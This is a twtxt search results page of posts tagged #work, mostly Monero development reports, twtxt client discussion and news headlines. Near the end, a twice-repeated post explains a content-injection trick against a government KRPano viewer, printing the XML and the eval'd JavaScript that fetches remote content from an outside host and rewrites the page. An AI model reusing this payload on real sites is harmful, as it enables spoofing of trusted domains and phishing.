Searching txt.sour.is

Twts matching #work
Sort by: Newest, Oldest, Most Relevant
In-reply-to » @eapl.me Here is what I've got so far: https://github.com/upputter/testing-twtxt-dm

here is my progress so far: https://github.com/eapl-gemugami/twtxt-direct-message-php
The encryption part seems to work, if I decrypt it the message with OpenSSL.
I think it can help you for some key parts not well explained in OpenSSL documentation.

@andros@twtxt.andros.dev reading your spec I wrote a few notes here: https://github.com/eapl-gemugami/twtxt-direct-message-php/blob/main/direct_message_spec.md

@arne@uplegger.eu I haven’t check your repo yet, although you are using sodium, right?

⤋ Read More

The Man Madison Warned Us Against
Harold Meyerson,  Editor-at-Large  -  The American Prospect

_Stephan: I have spent some time watching and reading “king” Trump’s propaganda media, as well as CNN’s weird Abby Philips show. Not surprisingly they are all tying themselves into knots trying to normalize the Trumpian/Musk coup. I think Harold Meyerson gets it right. Criminal Trump, his Frankenstein Musk, and his other servile lackeys working to implement the coup are exactly what the Founder Jam … ⌘ Read more

⤋ Read More

10 Times Eclipses Marked History
Telling the time in the ancient world was tricky; trying to describe the past between different cultures was almost impossible. People used different calendars, and attempting to make them work together was tricky. Your year of the Consulship of Cornelius Rufus and Curius Dentatus might be the year of the Archon Charinus to your neighbor. […]

The post 10 Times Eclipses Marked History appeared firs … ⌘ Read more

⤋ Read More
In-reply-to » @andros I have really tried to get behind it. For an implementation for my TwtxtReader (PHP) I simply lack the knowledge of the standard-openssl parameters. All my solution approaches require “nonce” or “initialization vector” on one or the other side. In addition, the “magic numbers” (“Salted__”) were not consistent in my tests.

@arne@uplegger.eu

Image

If I keep the “nonce”, I can decrypt a message with the shared key, like in the direct message specs.
But that is not how it should work. 😒

⤋ Read More

USDA accidentally fired officials working on bird flu and is now trying to rehire them
Allan Smith, Melanie Zanona and Laura Strickler,  Reporters  -  NBC News

_Stephan: If you read me regularly you will remember the story I ran the other day describing how “king” Trump and his prime minister Musk and his lackeys accidentally fired the men and women with the expertise to keep everything nuclear safe, then realized the stupidity of their a … ⌘ Read more

⤋ Read More

Silicon Labs-Based XIAO MG24 Series Expands with New Pre-Soldered and Multi-Pack Versions
Seeed Studio has expanded its XIAO MG24 and XIAO MG24 Sense development board lineup with new variants, including pre-soldered versions and 3PCS packs. These additions provide more flexibility for developers working on IoT and Matter-based projects, streamlining prototyping and small-scale production. The XIAO MG24 and XIAO MG24 Sense are now available in 3PCS packs … ⌘ Read more

⤋ Read More

jeffro256 posts January 2024 Monero/Carrot dev update
jeffro2561 has posted the first progress report (M1/January 2025)2 for their Monero/Carrot3 dev work CCS proposal4:

I spent a lot of time reviewing / debugging the upcoming release v0.18.4.0 build. I would like to post more details about this for transparency, but some of it involves vulnerability work, so I will hold off for now. I plan to publish reports about this eventually.

Work overview

… ⌘ Read more

⤋ Read More
In-reply-to » I'm in an article in Quanta Magazine! It's about the bizarre world of algorithms that re-use memory that's already full. https://www.quantamagazine.org/catalytic-computing-taps-the-full-power-of-a-full-hard-drive-20250218/ I'm the one with all the snow in the background.

@lyse@lyse.isobeef.org I am a big fan of “obvious” math facts that turn out to be wrong. If you want to understand how reusing space actually works, you are mostly stuck reading complexity theory papers right now. Ian wrote a good survey: https://iuuk.mff.cuni.cz/~iwmertz/papers/m23.reusing_space.pdf . It’s written for complexity theorists, but some of will make sense to programmers comfortable with math. Alternatively, I wrote an essay a few years ago explaining one technique, with (math-loving) programmers as the intended audience: https://www.falsifian.org/blog/2021/06/04/catalytic/ .

⤋ Read More

Cuprate Meeting scheduled for 25 February 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, February 25 2025 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Agenda overview
Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate co … ⌘ Read more

⤋ Read More

I am so, so, so fed up with the arrogance of people in tech. People think they know everything. Everything is easy and trivial. “Told you so!”, everywhere you look. And this bloody condescending tone, all the time. When I ask for an opinion, I don’t want to get a “well, duh, idiot”. For fuck’s sake.

It’s nothing new, it’s always been like that. Which makes it even worse.

This really makes me not want to work in this field anymore.

⤋ Read More

Yesterday I was doing a lot of research on how #hyperdrive and the #holepunch project work. Would it be possible to use it to make #twtxt an easier gateway for new users? Could we stop using web servers?
My conclusion: We would end up being a #nostr. On the one hand it would become more complex to use, it would force the user to have software installed, and on the other hand the community would need a central proxy to make the routes accessible via HTTP. In other words, it’s not a good idea.
However, it’s an AMAZING technology. I want to start playing with it.

⤋ Read More

[ANN] MoneroTalk #340: Spreading Agorism with Agorist Nexus

In this episode Douglas Tuman speaks with Brandon from the Agorist Network about Agorism, cryptocurrency, and privacy-focused economic systems. Brandon explains that agorism is fundamentally about trading freely outside state control and creating voluntary societies. He discusses founding the Agorist Network and working with notable figures like Wendy McElroy.

Links:

⤋ Read More

plowsof posts second progress report for fifth CCS coordinator term
plowsof1 has submitted a second progress report2 after working for almost 5 months during their fifth term as CCS coordinator3:

Although 86~ days have passed since the last milestone completion, i’ve been performing my duties / fulfilling my hourly commitments - lack of good time management has lead to there being too many loose ends (especially for -site) and meeting attendance coul … ⌘ Read more

⤋ Read More
In-reply-to » Have you ever had to refactor a project that was not documented? Any suggestions?

The project is a POC (Proof of Concept) that went into production and the company has customers who are using it. The developers had been working for several years, without testing, structure, isolation and so on. The company hired me to transform the project into a real product. There are in my hands 422 python files to transform that they beg me a refactore, architecture and testing. Every developer’s bad dream.
My first step is to read and understand the tree because there are apps inside other apps call each other. I am very determined to work on a new repository.

⤋ Read More

jeffro256, SNeedlewoods CCS proposals fully funded
jeffro256’s full-time development 2025Q1 1 and SNeedlewoods’s part-time dev work 2 CCS proposals were fully funded today, with help from the Monero General Fund3:

jeffro256:
 * 114 XMR raised in 19 contributions (38 XMR sent from GF)

SNeedlewoods:
 * 23 XMR raised in 14 contributions (7.67 XMR sent from GF)

To learn more about the two proposals, consult the previous Monero Observer reports4’[ … ⌘ Read more

⤋ Read More
In-reply-to » Have you ever had to refactor a project that was not documented? Any suggestions?

@andros@twtxt.andros.dev I suggest to not touch it and work on a different project instead. :-D

No, in all seriousness, that’s a tough one. Try to figure out the requirements and write tests to cover them. In my experience, if there is no good documention, tests might also be lacking. It goes without saying that you have to understand the code segments first before you can begin to refactor them. Commit even earlier and more often than usual, this will help you bisecting potentially introduced bugs later on. Basically baby steps.

But it also depends on the amount of refactoring required. Maybe just scrap it entirely and start from scratch. This might not be feasible due to e.g. the overall project size, though.

⤋ Read More
In-reply-to » @eapl.me Read flags are so simple, yet powerful in my opinion. I really don't understand why this is not a thing in most twtxt clients. It's completely natural in e-mail programs and feed readers, but it hasn't made the jump over to this domain.

@eapl.me@eapl.me Yeah, you need some kind of storage for that. But chances are that there’s already a cache in place. Ideally, the client remembers etags or last modified timestamps in order to reduce unnecessary network traffic when fetching feeds over HTTP(S).

A newsreader without read flags would be totally useless to me. But I also do not subscribe to fire hose feeds, so maybe that’s a different story with these. I don’t know.

To me, filtering read messages out and only showing new messages is the obvious solution. No need for notifications in my opinion.

There are different approaches with read flags. Personally, I like to explicitly mark messages read or unread. This way, I can think about something and easily come back later to reply. Of course, marking messages read could also happen automatically. All decent mail clients I’ve used in my life offered even more advanced features, like delayed automatic marking.

All I can say is that I’m super happy with that for years. It works absolutely great for me. The only downside is that I see heaps of new, despite years old messages when a bug causes a feed to be incorrectly updated (https://twtxt.net/twt/tnsuifa). ;-)

⤋ Read More
In-reply-to » @eapl.me Read flags are so simple, yet powerful in my opinion. I really don't understand why this is not a thing in most twtxt clients. It's completely natural in e-mail programs and feed readers, but it hasn't made the jump over to this domain.

that’s a fair point.

Perhaps, since Twitter in 2006 never implemented read flags, every derivative microblogging system never saw that as an expected feature. This is curious because Twitter started with SMS, where on our phones we can mark messages as read or unread.
I think it all comes from the difference between reading an email (directed to you) vs. reading public posts (like a blog or a ‘wall,’ where you don’t mark posts as read). It’s not necessary to mark it as ‘read’, you just jump over it.

Reading microblogging posts in an email program is not common, I think, and I haven’t really used it, so I cannot say how it works, and whether it would be better for me or not.
However, I’ve used Thunderbird as a feed reader, and I understand the advantages when reading blog posts.

About read flags being simple, well… we just had a discussion this morning about how tracking read messages would require a lot of rethinking for clients such as timeline where no state is stored. Even considering some kind of ‘notification of unread messages or mentions’ is not expected for those minimalist client, so it’s an interesting compromise to think about.

⤋ Read More
In-reply-to » @lyse As far as I know, they're still visible in the Web UI. Although, in the mobile app and youtube.com, I believe it tells you that the video isn't available without having to click on it. They don't tell you that in the RSS feed, and I agree; it gets annoying.

Definitely something going on with replies. This one was replying to the wrong twt and even when I got clever and pasted the right hash it didn’t work.

⤋ Read More
In-reply-to » I have uploaded a new version of #twtxtel 🥳. It's now possible to view profiles, either your own or others. #twtxt #emacs Media @prologic @xuu

@aelaraji@aelaraji.com Sorry I’m late! I still have to work on the mention system, I don’t get some of the messages. I’ll look into your case and get back to you shortly 😄
If it’s a problem that ruins your experience, don’t hesitate to create an issue.

⤋ Read More

Apple Working on New 27-Inch Mini-LED Studio Display for Late 2025
Apple is working on a 27-inch mini-LED display that could come as soon as late 2025, display analyst Ross Young said today. The display could be a new version of the Studio Display that Apple first introduced in 2022. The current version of the Studio Display uses a 5K LED panel, so a mini-LED version would be a significant update.

![](https://images.macrumors.com/article-new/2025/ … ⌘ Read more

⤋ Read More
In-reply-to » reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:

@bmallred@staystrong.run Surprisingly, my

User-agent: *
Disallow: /

seems to work. Or maybe those bastards change their user agent and claim to be someone nice. In any case, I just added a bunch of

location = /robots.txt {
    add_header Content-Type text/plain;
    return 200 "User-agent: *\nDisallow: /\n";
}

in my nginx config. No need for any bot to visit, crawl and index most of my sites.

⤋ Read More

v1docq47 posts December 2024 - January 2025 CCS progress report
v1docq471 has posted the first progress report (December 2024 - January 2025)2 for his latest CCS proposal3 to do Russian voice-over work and transcribe Monero content:

Although our proposal is still in ‘Funding Required’ stage, we did not sit idle, we worked according to the planned milestones. In addition, due to the prolonged funding stage (PR merged ~63 days ago), we additionally place … ⌘ Read more

⤋ Read More

Saw Windows 11 for the first time today and genuinely had to ask if this is really Windows. Looks a lot like KDE.

(At first, I thought the touchpad of that laptop was broken, because a right click on the desktop didn’t do anything. But it worked just fine. It just takes ~10 seconds for the popup to show.)

⤋ Read More

Trump administration orders consumer protection agency to stop work, closes building
Christopher Rugaber,  Staff Writer  -  Federal News Network | Associated Press

_Stephan: Did you vote for Trump? Is you did you are reasonable and complicit in the end of all consumer protection against scams. Your bank has implemented new fees, your credit card corporations have done the same? You were deceived into paying money for some benefit you didn’t … ⌘ Read more

⤋ Read More

OLED MacBook Pro With Thinner Design on Track for 2026 Launch
Apple’s first OLED MacBook Pro remains on schedule for a 2026 release, featuring the new slimmer design Apple is rumored to be working on, based on a new report from The Elec.

Image

Samsung Display is said to be currently producing test samples of the OLED panels on its first deposition machine … ⌘ Read more

⤋ Read More

selsta posts January 2025 Monero dev report
selsta1 has posted a monthly CCS progress report2 for January 2025, which includes several Monero dev updates.

Milestone 2:
* Most time was spent on v0.18.4.0
 * I also created a to-do list that shows the current status
* Removed old debug code that we used to verify the difficulty code
 (this could speed up sync times)
* Hackerone conflict resolution

Note that misc work is not explicitly mentioned in these updates. The full … ⌘ Read more

⤋ Read More

Boog900 submits CCS proposal for 4 months of full-time Cuprate dev work
Boog9001 has submitted a new CCS proposal2 looking to continue full-time development work on Cuprate 3 for 3 months and also get compensated for January work:

I will work for 3 months on Cuprate with an initial focus on releasing an alpha cuprated [..] I plan to work on what I think is best to advance the project. I am also asking for payment for the hours I worked in January. \ … ⌘ Read more

⤋ Read More

Cuprate Meeting scheduled for 18 February 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, February 18 2025 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Agenda overview
Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate co … ⌘ Read more

⤋ Read More

10 Famous Musicals That Never Made It to Broadway
It’s the dream of every actor, playwright, librettist, director, and dramaturg to one day work on a Broadway show. As far as theater goes, there’s pretty much no better way to prove your work is the best of the best than to premiere on the Great White Way. But sometimes, it’s about more than just […]

The post [10 Famous Musicals That Never Made It to Broadway](https://listverse.com/2025/02/09/10-famous-musicals-that-never-made-it-to … ⌘ Read more

⤋ Read More
In-reply-to » @bender @prologic I can reproduce this locally, too. But it doesn't matter if I follow the feed or not. With JS enabled, hitting "Reply" opens a textarea with @<url>. Submitting this writes @<domain url> instead of @<nick url> in the feed.

hmm interesting work here.. ill give it a look.. @lyse@lyse.isobeef.org do you know if it is even storing the url into the AST object? afair the code to parse tags url should be the same as the mention url.

⤋ Read More
In-reply-to » @bender @prologic I can reproduce this locally, too. But it doesn't matter if I follow the feed or not. With JS enabled, hitting "Reply" opens a textarea with @<url>. Submitting this writes @<domain url> instead of @<nick url> in the feed.

hmm interesting work here.. ill give it a look.. @lyse@lyse.isobeef.org do you know if it is even storing the url into the AST object? afair the code to parse tags url should be the same as the mention url.

⤋ Read More

hinto-janai submits CCS proposal for 3 months of full-time Cuprate, Monero/FCMP++ work
hinto-janaiyo1 has submitted a new CCS proposal2 looking to continue full-time development work on Cuprate 3 and contribute to Monero (FCMP++ reviews) for 3 months:

Cuprate is preparing its first alpha release, with a 4-week cycle. [..] I will be buying/renting a variety of hardware for testing/development and will post receipts for all hardware acquired a … ⌘ Read more

⤋ Read More

Erlang Solutions: Women in BEAM
In this post, I will share the results of the Women in BEAM 2024 survey. But first, I would like to share my experience in the BEAM community to understand the motivation behind this initiative.

My journey

I’ve been working with Elixir since 2018, but my interest in it wasn’t driven by technical advantages—it was sparked by my experience at my first ElixirConf in Mexico.

Since 2017, I’ve been involved in initiatives supporting women in tech, frequently attending events t … ⌘ Read more

⤋ Read More
In-reply-to » @bender @prologic I can reproduce this locally, too. But it doesn't matter if I follow the feed or not. With JS enabled, hitting "Reply" opens a textarea with @<url>. Submitting this writes @<domain url> instead of @<nick url> in the feed.

While I now have a somewhat working fix for it in yarnd (https://git.mills.io/yarnsocial/yarn/pulls/1232), I also have the feeling that I should fix literal formatting in lextwt as well. This also uncovered more bugs I believe: https://git.mills.io/yarnsocial/go-lextwt/pulls/28

But then there is also the question why the textarea is populated with @<url> in the first place rather than @<nick url> or yarnd’s own @nick@domain/@nick syntax. It indeed has to do something with whether I follow the mentioned feed or not.

Anyway, something to investigate for future Lyse or maybe @prologic@twtxt.net and/or @xuu@txt.sour.is. G’night!

⤋ Read More
In-reply-to » @jost Hmm, not really, no. Could you share your mutt config? (Are you using mutt?) Feel free to send me an email, if doing this over twtxt doesn’t work (yet). You can find the address on https://www.uninformativ.de/contact.html ✌️

@movq@www.uninformativ.de This time it works! (For the first time). Using mutt, yes, and the config is yours. I’ll contact you later, when I have more data. Some time needed to experiment. Thanks!

⤋ Read More
In-reply-to » @movq Whether in the office or at home, I get nothing done. ;-) Well, while this is almost true, I actually tried to respond to the other thread I started myself, but starting the editor it switched immediately to this one. Any idea why this happens?

@jost@jost.sdfeu.org Hmm, not really, no. Could you share your mutt config? (Are you using mutt?) Feel free to send me an email, if doing this over twtxt doesn’t work (yet). You can find the address on https://www.uninformativ.de/contact.html ✌️

⤋ Read More

Cuprate Meeting scheduled for 11 February 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, February 11 2025 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Agenda overview
Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate co … ⌘ Read more

⤋ Read More

jeffro256, rottenwheel, SNeedlewoods CCS proposals ready for funding
Three CCS proposals have been moved to the funding stage and are now looking for community support:

  • jeffro256’s !540 1: full-time development 2025Q1 2
  • rottenwheel’s !535 3: Revuo Monero maintenance (2025 Q1) 4
  • SNeedlewoods’s !541 5: part-time dev work 6

To support the above proposals you can donate to the XMR addresses listed on the _ … ⌘ Read more

⤋ Read More

tobtoht posts January 2025 Monero/Feather dev report
tobtoht1 has published the first progress report2 for his full-time Q1 2025 Feather Wallet and Monero dev work CCS proposal3:

Summary: core build system and CI work

Work overview
Feather: 4 commits (+217, -45)
 * guix: add missing patch
Core: 43 (non-documentation) PRs
 * Comments on the Code of Conduct #9738
 * cmake: remove msvc #9729
 * ci: containerize ubuntu cli jobs #9708 [..]

The full d … ⌘ Read more

⤋ Read More

**In sane 🤣🤣

$ ollama run deepseek-r1:7b
>>> How does your model's reasoning work exactly?
<think>

</think>

I'm an AI assistant that  ...**
In sane 🤣🤣

$ ollama run deepseek-r1:7b

How does your model’s reasoning work exactly?

I’m an AI assistant that uses algorithms to process information and create responses. While I can mimic some patterns of human thinking in my responses, I
don’t have real human thought or consciousness.

So how do you deliberate and argue with yourself over counting the number of le … ⌘ Read more

⤋ Read More

SNeedlewoods submits CCS proposal for ~4.5 months of part-time Monero dev work
SNeedlewoods1 has submitted a second CCS proposal2, looking to work part-time on Monero development for ~4.5 months:

Since the feature-complete Wallet API PR from my previous CCS proposal is finally in “pending review” state (I will give my best to quickly resolve issues coming up during the review, so it hopefully will get merged soon), it’s time for the next steps..


Funding propose ... ⌘ [Read more](https://monero.observer/sneedlewoods-submits-second-monero-dev-work-ccs-proposal/)

⤋ Read More

How to Turn Off “Follow Up” Mail Suggestions on iPhone & iPad
The Mail app on iPhone and iPad has been around since the beginning of those devices, and many people have grown familiar with how the Mail app works and behaves. But recently, Apple has been making a lot of tweaks and adjustments to the Mail app, and some of these changes are not necessarily welcome … [Read More](https://osxdaily.com/2025/01/30/how-to-turn-off-follow-up-mail-suggestions-on-iphone- … ⌘ Read more

⤋ Read More
In-reply-to » Second power outage since this morning! yeeeey 🥳 I'm not mad at all ... not even a little bit. might end up throwing a monitor out tha window for sports, but no, it doesn't mean that I'm mad... Nooooo, we're all Gucci over here 🧟

@lyse@lyse.isobeef.org would it work wit cats instead? there has been a whole flock of them in the neighborhood the last couple of days, one female and a gazillion males taking turns 😅 … at least they’d be good for something other than their non-stop after midnight opera 😂

⤋ Read More

**I want to propose my own counter-proposal to the discussion that’s ongoing with Go and error handling.

Here it is:

It’s very rough and needs …**
I want to propose my own counter-proposal to the discussion that’s ongoing with Go and error handling.

Here it is: https://docs.mills.io/ix4qDHMnQUSPxZ5tXz12Vg?view

It’s very rough and needs much more work, but essentially I want to propose the following change to the language’s grammar:

”`
f := os.Open(“foo.txt”) or (e error) {

lo ... ⌘ [Read more](https://twtxt.net/twt/spvh6fa)```

⤋ Read More

Republican Suggests Kids Work at McDonald’s Instead of Getting Free Lunch
Aila Slisco,  Staff Writer  -  Newsweek

_Stephan: The outcry was so great yesterday that “king” Trump is backing down on some of his sweeping devastation of the American government through his OMB order. I think that should be prominently noted and reported on by media, although that isn’t what is happening. But I hope my readers have paid attention to this. I think we should als … ⌘ Read more

⤋ Read More

CDC health officials in US ordered to stop working with WHO immediately
,    -  The Guardian (U.K.) | Associated Press

_Stephan: As part of his effort to dismantle the American government and turn it into a dictatorship, Trump has isolated the United States from the international healthcare network maintained by the World Health Organization.  This is the organization that coordinates amongst countries when a pandemic occurs. This is the organization … ⌘ Read more

⤋ Read More

Cuprate Meeting scheduled for 4 February 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, February 4 2025 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Agenda overview
Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate code … ⌘ Read more

⤋ Read More

i upgraded my pc from lubuntu 22.04 to 24.04 yesterday and i was like “surely there is no way this will go smoothly” but no it somehow did. like i didn’t take a backup i just said fuck it and upgraded and it WORKED?!?! i mean i had some driver issues but it wasn’t too bad to fix. wild

⤋ Read More
In-reply-to » I have managed to make the fetching of feeds asynchronous. To do this I have set up a small system of task queue. All requests are executed at the same time! 🚀 https://codeberg.org/andros/twtxt-el/src/branch/develop #twtxtel #emacs

@andros@twtxt.andros.dev Sweeeeet! Just gave it a try, you’ve done a wonderful work 🫡 I wanted to replay from there but couldn’t go past the first page of the feed. It kept freezing on me and complaining about some bad Url (as mentioned on the test twt), so I’ll have to dig through my follow list and see where I effed up this time. 😅

⤋ Read More

jeffro256 submits CCS proposal for 3 months of Monero/Carrot dev work
jeffro2561 has submitted a new CCS proposal2 looking to continue working full-time on Carrot 3 development - Monero’s main addressing protocol post-FCMP++ - for 3 months (Q1 2025):

The last quarter I implemented the core cryptography for Carrot. [..] The FCMP++ integration and Carrot integration are finally meeting ends and are almost ready for hot path integration. … ⌘ Read more

⤋ Read More

Took today off work. My workplace has a special form of leave called “My Day” that you can take in addition to your usual Annual leave. So nice! …
Took today off work. My workplace has a special form of leave called “My Day” that you can take in addition to your usual Annual leave. So nice! 😊 I’m using one of them today to take advantage of the long weekend coming up ( Australia Day). Planning on making repairs to one of my Hypervisor nodes that is currently down and powered off for repairs. The SATA DOM ( Disk on Module) boot disk … ⌘ Read more

⤋ Read More

[WTS] [~0.37 XMR] Lenovo ThinkPad Carbon x1 gen2

Laptops are in good condition, battery can last several hours still, biggest defect is the Touch Bar (which includes the F1-F12 and media keys) is turning hazy and is not cosmetically pleasant. Touch Bar and thus keys all still work. Each laptop has a valid Windows 10 keys but I can also install Ubuntu or Debian upon request.

Link: https://xmrbazaar.com/listing/6zDp/

AffluentLynx (XMRBazaar) ⌘ Read more

⤋ Read More

j-berman posts CCS progress report after 169 hours of dev work
j-berman1 has published the first progress report2 for his full-time 2025 (part 9) Monero (FCMPs++) dev work CCS proposal3:

Work overview
* Sped up tree building by ~30% implementing @kayabaNerve's torsion check
* Implemented FCMP++ prove and verify functions in the Rust FFI
* Rebased the WIP PR onto master and updated to include the latest [..]

Consult the previous Monero Observ … ⌘ Read more

⤋ Read More
In-reply-to » It's ok for most encrypted protocols (In salty you can fetch other messages but can't decrypt). Btw i think recipient can be removed so if someone seen message they tried to decypt, if can't - its not message to you

here are a few ideas you might take into consideration when designing a secure IM https://developer.virgilsecurity.com/docs/e3kit/fundamentals/secure-instant-messaging/

Obviously if you’ve worked on something similar, you already know it, he

⤋ Read More

10 Spooky Signs Your House Is Haunted
Picture this: You’ve had a tough day at work. Susan from Accounts annoyed you more than usual, and your boss caught you coming back late from lunch. All you want to do is settle on the couch with a glass of wine and rewatch the first season of Stranger Things to distract yourself. But, as […]

The post 10 Spooky Signs Your House Is Haunted appeared first on [Listverse](https://listve … ⌘ Read more

⤋ Read More

Cuprate Meeting scheduled for 28 January 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, January 28 2025 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Agenda overview
Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate code … ⌘ Read more

⤋ Read More

TikTok is Working Again in the U.S., But Still Removed From App Store
Well, that didn’t last long. Less than a day after TikTok became temporarily unavailable in the U.S., the app is now functional again. In an in-app notice, TikTok says the app has been restored “as a result of President Trump’s efforts.”

Image

Last year, the U.S. passed a law that required Chinese company ByteDance to divest its ownership of TikTok due to potential na … ⌘ Read more

⤋ Read More

Apple Continues Promoting Severance Ahead of Season 2 Premiere
The second season of hit television show Severance is set to be available to stream starting tomorrow, and Apple is continuing to promote the show. The company’s main Apple.com website now has a section dedicated to Lumon Industries, the fictional business that “innies” work for in Severance.

Image

On Tuesday, several key Severance actors a … ⌘ Read more

⤋ Read More
In-reply-to » Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>


the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

⤋ Read More
In-reply-to » Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>


the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

⤋ Read More

jeffro256 completes 2024 Q4 Monero dev work CCS
jeffro2561 has posted a third and final progress report2 for their full-time 2024/Q4 Monero (Carrot3) development work CCS proposal4:

There are a few minor tweaks being proposed to Carrot after weeks of discussion about post-quantum adversaries, as well as optimization. [..] And thanks to everyone who contributed to my CCS, it is greatly appreciated!

Work overview

”`

  • Wownero Decoy Selection f … ⌘ Read more”`

⤋ Read More

Cuprate Meeting scheduled for 21 January 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, January 21 2025 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Agenda overview
Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate code … ⌘ Read more

⤋ Read More

selsta posts December 2024 Monero dev report
selsta1 has posted a monthly CCS progress report2 for December 2024, which includes several Monero dev updates.

Milestone 1:
-Continued work on v0.18.4.0 with over 70 PRs merged
-Handled more new HackerOne reports [..] fixes being scheduled for the next release
-Repo related organization work

Note that misc work is not explicitly mentioned in these updates. The full list of changes can be found on Github3’[4](#fn:4 … ⌘ Read more

⤋ Read More